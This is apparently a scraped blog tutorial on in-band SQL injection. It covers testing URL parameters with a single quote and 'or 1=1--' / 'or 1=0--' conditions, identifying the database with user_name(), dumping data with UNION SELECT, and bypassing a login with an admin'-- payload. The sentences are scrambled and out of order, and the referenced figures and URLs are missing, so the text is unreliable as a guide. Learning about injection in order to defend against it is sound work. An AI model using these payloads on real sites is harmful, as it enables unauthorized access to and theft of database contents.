As a first trial, I am entering “user_name()” at the place where we had “2”. So let’s try to find the DBMS of our SQLI vulnerable site. For example, to find out the database user, all the above databases have different syntaxes. We can find out DBMS type (MS-SQL, MySQL, ORACLE) by using the unique functions of the appropriate database. Moving further, we can extract or dump the complete database by using “UNION” and “SELECT” commands. You can try all the combinations for string “or a=a” that we have tried for “or 1=1″… Like #,–, /* and so on. The string listed in the below table can be used to confirm SQL Injection: Then we can confirm that the URL is vulnerable to SQLI. Figure 3 shows the page when accessed with the false condition. Now we will not be able to access the page, because the condition “1=0” is always false. So the URL looks like: or 1=0– or and 1=0–. Now try to access by entering the string “or 1=0–“or “and 1=0–“.
This is because the condition that we have entered at the end of the URL is always true. The above URL shows the same page that has been displayed while accessing the URL. If single quote (‘) is blocked, then we can try using “or 1=1 –” or “and 1=1” at the end of the URL: Figure 2 shows you the error occurred due to concatenating the special character (‘). So by seeing the error, we can understand that the URL is vulnerable to in-band SQLI. This is because of an extra single quote (‘) that we have entered through the URL into the query in the background. The above URL shows an error on the web page saying “Error in your SQL Syntax”. Now let’s try to confirm the vulnerability by simply adding a single quote at the end of the URL: We can get these practice sites from Google.īy accessing the URL, the browser displays the home page as shown in Figure 1: The above URL is an In-band SQLI vulnerable practice site. The application directly displays the retrieved data on the web pages. the attacker uses the same channel to enter the malicious string and to retrieve the data from the database.
The application is said to be vulnerable to in-band when the communication between the attacker and the application happens through a single channel, i.e. This is also called error-based or union-based SQL injection or first order Injection. There are three different kinds of SQL Injections possible on web applications. Select * from users where username='admin' Note the comment sequence (–) causes the followed query to be ignored, so query executed is equivalent to: Select * from users where username='admin'–' and password='xxx' If the attacker knows the username of the application administrator is admin, he can log in as admin without supplying any password. Select * from users where username='admin' and password='admin123′
0 kommentar(er)
